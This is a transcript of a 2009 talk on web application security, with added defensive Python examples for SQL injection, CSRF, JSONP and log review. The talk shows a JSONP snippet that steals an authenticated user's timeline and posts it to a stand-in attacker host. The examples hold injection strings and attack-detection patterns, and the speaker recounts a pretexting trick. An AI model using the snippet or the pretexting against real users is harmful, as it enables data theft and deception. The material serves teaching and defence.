Things that go bump on the web - Web Application Security
Things that go bump on the web
Christian Heilmann | http://wait-till-i.com | http://scriptingenabled.org
Web Directions North, Denver, Colorado, February 2009
Disclaimer: The following is a personal presentation and the views do not necessarily reflect those of my employer or the conference organizer!
There will be strong language, public exposure (of security issues) and some strong opinions.
Viewer discretion is advised.
Hello, I am Chris.
I’m here today to talk to you about web application security.
I’ve seen several security presentations myself.
And they fall into a few categories:
Technical mumbo jumbo that leaves you feeling inadequate and scared.
“Neener Neener, look what I can hack” show-offs.
“Use our systems or you’ll be dead tomorrow.” sales pitches.
I wanted to avoid anything like that.
My intention is not to leave you feeling patronised...
...confused or scared.
I want to point out several basics of web security...
...and offer some ideas of how you can prevent the worst and help us make the web safer.
Here’s what I will go through:
Close the gates.
Clean up your mess.
Don’t breed idiots.
Stay up-to-date.
Constant Vigilance, Harry!
censored
Close the Gates!
Here’s a quick roundup of attack technologies and methodologies you should know about.
XSS!
https://www.owasp.org/index.php?title=XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
XSS means that people can successfully inject something into your sites that shouldn’t be there.
Successfully injecting JavaScript into your site allows me to steal and fake the identity of your users or yourself.
SQL Injection
Always filter SQL statements from your requests!
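The slide gives the advice in one line; as an added example, not from the deck, here is the robust form of that filtering: bind request values as query parameters instead of splicing them into the SQL text, and allow-list anything that cannot be bound, such as a column name. Python's standard sqlite3 module, the users table and the sample values are assumptions constructed for the example.

```python
import sqlite3


def build_db():
    """Constructed in-memory table standing in for a real users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users (name, email) VALUES (?, ?)",
        [("alice", "alice@example.org"), ("bob", "bob@example.org")],
    )
    conn.commit()
    return conn


def find_user_unsafe(conn, name):
    """The bug: the request value is spliced into the SQL text, so it is parsed as SQL."""
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def find_user_safe(conn, name):
    """Parameterised query: the value travels separately from the statement and is
    never interpreted as SQL, whatever quotes or keywords it contains."""
    return [row[0] for row in conn.execute("SELECT name FROM users WHERE name = ?", (name,))]


# Identifiers (column or table names) cannot be bound as parameters; allow-list them.
ALLOWED_SORT_COLUMNS = ("name", "email")


def is_allowed_sort(column):
    return column in ALLOWED_SORT_COLUMNS


def list_users_sorted(conn, sort_by):
    if not is_allowed_sort(sort_by):
        raise ValueError("unsupported sort column")
    return [row[0] for row in conn.execute("SELECT name FROM users ORDER BY " + sort_by)]


# Constructed request value of the classic tautology kind.
INJECTION = "x' OR '1'='1"
```

Run with the constructed INJECTION value, the unsafe lookup returns every row while the parameterised one returns none, which is the whole difference between escaping by hand and letting the driver keep data and code apart.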
CSRF!
http://en.wikipedia.org/wiki/Cross-site_request_forgery
CSRF happens when you have predictable URLs to initiate actions – like deleting a form post or transferring money.
This URL could then be called in the background from another site – via an image or a form submission in JavaScript.
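The defence the slides imply is to make the action request unpredictable per user and per action. As an added example, not from the deck: a session-bound, action-bound, expiring CSRF token built with an HMAC, plus the handler that rejects the cross-site form post just described. The secret, the session ids and the hypothetical delete_post handler are constructed assumptions.

```python
import hashlib
import hmac
import secrets
import time

# In production this is a persistent secret loaded from configuration;
# here it is generated per process (constructed for the example).
SERVER_SECRET = secrets.token_bytes(32)


def _mac(session_id, action, ts, secret):
    msg = (session_id + "|" + action + "|" + str(ts)).encode("utf-8")
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def issue_csrf_token(session_id, action, now=None, secret=SERVER_SECRET):
    """Token bound to the user's session and to one action, with a timestamp."""
    ts = int(time.time() if now is None else now)
    return str(ts) + "." + _mac(session_id, action, ts, secret)


def verify_csrf_token(token, session_id, action, now=None, max_age=3600, secret=SERVER_SECRET):
    """False for a missing, malformed, expired, foreign-session or wrong-action token."""
    try:
        ts_str, mac = token.split(".", 1)
        ts = int(ts_str)
    except (ValueError, AttributeError):
        return False
    current = int(time.time() if now is None else now)
    if ts > current or current - ts > max_age:
        return False
    # Constant-time comparison so the check itself does not leak the MAC byte by byte.
    return hmac.compare_digest(_mac(session_id, action, ts, secret), mac)


def handle_delete_post(session_id, form, now=None):
    """Server side of a hypothetical POST /posts/delete. A form submitted from
    another site carries the victim's cookie but cannot know this token."""
    if not verify_csrf_token(form.get("csrf_token", ""), session_id, "delete_post", now=now):
        return "403 Forbidden"
    return "200 deleted post " + str(form.get("post_id"))
```

The token is rendered into the site's own forms and checked on every state-changing POST; a page on another origin cannot read it, so the image or auto-submitted form the slide describes arrives without one and is refused. Browsers today additionally offer the SameSite cookie attribute, which limits when the cookie is sent on cross-site requests, but the token remains the check the application itself controls.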
Clickjacking
http://ha.ckers.org/blog/20080915/clickjacking/
Clickjacking is a trick to cover a real interface in an IFRAME with a transparent GIF or Flash movie...
...to send you to another site, or to pretend there was a problem and ask you to log in again.
Isn’t it interesting that the Verified by Visa security tool makes that look very normal?
Phishing!
Phishing means showing a familiar interface and luring users into entering data.
The only way to prevent this is to let the user choose a secret only they know...
...like the Yahoo sign-in seal.
I approve of this!
XBCR!
http://en.wikipedia.org/wiki/Cross-boundary-currency-request
FAKE!
Clean up your mess!
A lot of security problems happen because people leave data behind.
This can be in their HTML.
Comments are not a good tool to turn off sections of the page that shouldn’t be available yet!
Or it can be in JavaScript...
Or on their server:
Or in their browsers.
I built TweetEffect.com, a small tool to check your Twitter follower changes.
And then I got this email (not real size, it had to be resized)
I checked the user name and saw nothing – just a “this user isn’t available”.
What happened?
Apparently this person was logged in, and was therefore authenticated to see the updates.
The same thing happens when one of the friends of that person is logged in!
So, this is interesting...
Step 1: Log in yourself
Step 2: Get his list of followers
Step 3: Set the trap
You can get a user’s updates with a simple REST call:
http://twitter.com/statuses/user_timeline/codepo8.xml?count=200
<img src="tuna_funny.jpg" alt="tee hee hee">
<form method="post" action="http://evilsite.net/leech.php">
  <input type="hidden" value="" name="muahaha">
</form>
<script>
function evilgenius(o){
  var m=document.getElementById('muahaha');
  m.value=o;
  document.forms[0].submit();
}
</script>
<script src="http://twitter.com/statuses/user_timeline/tuna.json?count=200&callback=evilgenius"></script>
...alternatively use Ajax...
Step 4: Get a random friend of tuna to visit the site.
As they are authenticated, the data will be returned without question and sent to your server.
Learnings: Do not trust browsers, ever!
A lock on a screen does not mean protection!
You are as protected as the people you deal with.
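The steps above work because the timeline endpoint returned cookie-authenticated data wrapped in a caller-chosen JavaScript callback, which any page on the web can load with a script tag. As an added example (not from the deck, and not Twitter's code), here is the server-side rule that closes that hole: honour the callback parameter only for public data, validate the callback name, and keep cookie-gated data on the plain-JSON path that a cross-site script tag cannot read. The TIMELINES and AUTHORISED_SESSIONS tables, the request dictionary shape and the status codes are constructed assumptions.

```python
import json
import re

# Only a plain JavaScript identifier is accepted as a callback name (constructed policy).
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]{0,63}$")

# Constructed sample data: one public timeline, one friends-only timeline.
TIMELINES = {
    "codepo8": {"user": "codepo8", "protected": False, "statuses": ["hello Denver"]},
    "tuna": {"user": "tuna", "protected": True, "statuses": ["friends only"]},
}
# Constructed session table: which cookie sessions may read which protected timeline.
AUTHORISED_SESSIONS = {"tuna": {"sess-tuna", "sess-friend-of-tuna"}}


def jsonp_body(obj, callback):
    """Wrap public data in the callback; < and > are escaped so the body cannot
    be turned into markup if it is ever served as HTML by mistake."""
    payload = json.dumps(obj).replace("<", "\\u003c").replace(">", "\\u003e")
    return callback + "(" + payload + ");"


def user_timeline(request):
    """request is a dict with 'user', 'query' (dict of query parameters) and
    'cookie_session' (str or None). Returns (status, content_type, body)."""
    timeline = TIMELINES.get(request["user"])
    if timeline is None:
        return 404, "text/plain", "not found"
    callback = request["query"].get("callback")
    if callback is not None:
        if not CALLBACK_RE.match(callback):
            return 400, "text/plain", "bad callback name"
        if timeline["protected"]:
            # The whole point: a <script src> on a third-party page runs with the
            # visitor's cookies, so cookie-gated data must never be served this way,
            # even when the visitor's session would be allowed to read it.
            return 403, "text/plain", "JSONP is not available for protected timelines"
        return 200, "application/javascript", jsonp_body(timeline, callback)
    if timeline["protected"]:
        session = request.get("cookie_session")
        if session not in AUTHORISED_SESSIONS.get(request["user"], set()):
            return 401, "text/plain", "authentication required"
    return 200, "application/json", json.dumps(timeline)
```

The plain-JSON branch may still rely on the cookie because a JSON body is only readable by same-origin XMLHttpRequest (absent an explicit cross-origin grant), whereas the script-tag branch hands the data to whichever page included it. That asymmetry is the "do not trust browsers" lesson in code: the browser will happily send the cookie; the server has to decide what that cookie is allowed to unlock in each response format.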
Which brings me to the next point...
I am now going to be a bit daring.
I will ask you to question common ways of thinking and to consider alternatives.
DANGER!
Don’t breed idiots!
I’m a designer, why should I care about web application security?
Designers help users do the right things in the easiest and most effective manner.
We have the chance to increase usability to stop people repeatedly shooting themselves in the foot.
None of this!
Users should be conditioned not to trust blindly.
Yet we tell them to store their information on computers and give them an option to stay logged in.
Getting information out of people is easy:
Be confident, show (or fake) authority, keep things confusing and give them a wrong sense of urgency.
“Look, your wireless is flaky, I am in the middle of a phone conference and it keeps dropping out. Is there a wired connection in this lounge?”
“Do you have a first class ticket?”
“I just asked you where the wired connection is, this is an urgent conference and I need to answer this now!”
= Chris had some hours in the first class lounge!
Why did that work?
People are used to being treated like this.
We also don’t tell users off for using clever passwords like “password” or “happiness”.
Don’t make your end users suffer for your lack of security.
CAPTCHAS solve nothing!
http://caca.zoy.org/wiki/PWNtcha
Here’s a challenge for you design and marketing wizards:
How about an interface that makes it fun to change your password every week?
And here’s a challenge for security experts:
Use HUMAN language!
“confused deputy”
“man in the middle attack”
“the password antipattern”
How about
“giving your login and password for one system to another system is like writing your pin number on your credit card and asking a stranger to buy something for you!”
Stay up to date!
There is no security in sticking with outdated systems.
Therefore make sure to keep your server, your client software and your operating system up-to-date.
Even if companies offer a way out not to “break the web”.
None of this!
This also applies to your skills.
If you *don’t* want to be the guardian against evil and have *your butt on the line* when things go bump...
...build with frameworks!
Symfony, Django, Rails all offer out-of-the-box filtering and sanitization.
If there is a vulnerability, it can be fixed by a lot of people and pushed out as an update.
Constant vigilance!
Screenshot from Harry Potter and the Goblet of Fire, found on some blog but probably courtesy of Warner Brothers
The most important thing for you is to constantly be aware of what your servers are up to.
This *does* include your blog and portfolio!
Any server can be a spam hub or part of an attack network.
Your friends are:
Server logs
Statistics software
Don’t just look at the numbers
More interesting are
“posted forms”
And “page query terms”
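Server logs, posted forms and page query terms are the three friends the slides name. As an added example that is not from the deck, here is a small Python review over constructed Apache combined-format log lines: it flags POSTs to paths the site has no form for, and query strings or paths that carry SQL-injection, script or directory-traversal markers, then counts findings per client address. The log lines, the KNOWN_POST_PATHS set and the patterns are constructed assumptions; on real traffic the patterns need tuning against false positives.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Apache "combined" log format (constructed regex, referer/user-agent optional).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?$'
)

# Crude markers, applied to the percent-decoded path and query (constructed).
SUSPICIOUS = [
    ("sqli", re.compile(r"(?i)(\bunion\b.*\bselect\b|'\s*or\s+'?\d+'?\s*=\s*'?\d+|--\s*$|;\s*drop\b)")),
    ("xss", re.compile(r"(?i)(<script|javascript:|onerror\s*=|onload\s*=)")),
    ("traversal", re.compile(r"\.\./")),
]

# Forms the site actually has; a POST anywhere else deserves a look (constructed).
KNOWN_POST_PATHS = {"/comment", "/login"}

# Constructed sample log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Feb/2009:10:15:32 +0000] "GET /index.php?id=42 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Feb/2009:10:15:40 +0000] "GET /index.php?id=42'%20OR%20'1'='1 HTTP/1.1" 200 9871 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Feb/2009:10:16:01 +0000] "POST /comment HTTP/1.1" 302 0 "http://example.org/post/7" "Mozilla/5.0"
198.51.100.9 - - [10/Feb/2009:10:16:05 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 221 "-" "curl/7.19"
203.0.113.7 - - [10/Feb/2009:10:17:12 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Feb/2009:10:17:30 +0000] "GET /static/../../etc/passwd HTTP/1.1" 403 0 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """One log line -> dict of fields, or None if it does not match the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the list of tags for one parsed entry (empty list = nothing noteworthy)."""
    tags = []
    parts = urlsplit(entry["target"])
    path = unquote_plus(parts.path)
    query = unquote_plus(parts.query)
    if entry["method"] == "POST" and parts.path not in KNOWN_POST_PATHS:
        tags.append("unexpected-post")
    for name, pattern in SUSPICIOUS:
        if pattern.search(query) or pattern.search(path):
            tags.append(name)
    return tags


def review(log_text):
    """Scan a whole log; return (ip, method, target, tags) for each flagged line."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        if tags:
            findings.append((entry["ip"], entry["method"], entry["target"], tags))
    return findings


def top_offenders(findings):
    """Client addresses ordered by number of flagged requests."""
    return Counter(ip for ip, *_ in findings).most_common()
```

Decoding the query before matching matters: the second and fifth sample lines carry their payloads percent-encoded, exactly as a statistics package would list them under "page query terms", and a pattern run over the raw line would miss them. The "unexpected-post" tag is the cheap version of the slide's "posted forms" view: you know which paths accept a form, so anything else receiving a POST is either a scanner or a bug worth reading the log around.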
Keep up-to-date with what’s happening in web security.
http://simonwillison.net/tags/security/
Stay curious to poke at things and find out their flaws and report them!
Christian Heilmann
http://wait-till-i.com
http://scriptingenabled.org
http://twitter.com/codepo8
T H A N K S !
Images by icanhazcheeseburger.com, failblog.org, kqe.de and from the web. Eye photo: http://flickr.com/photos/jaredmoo/2113943480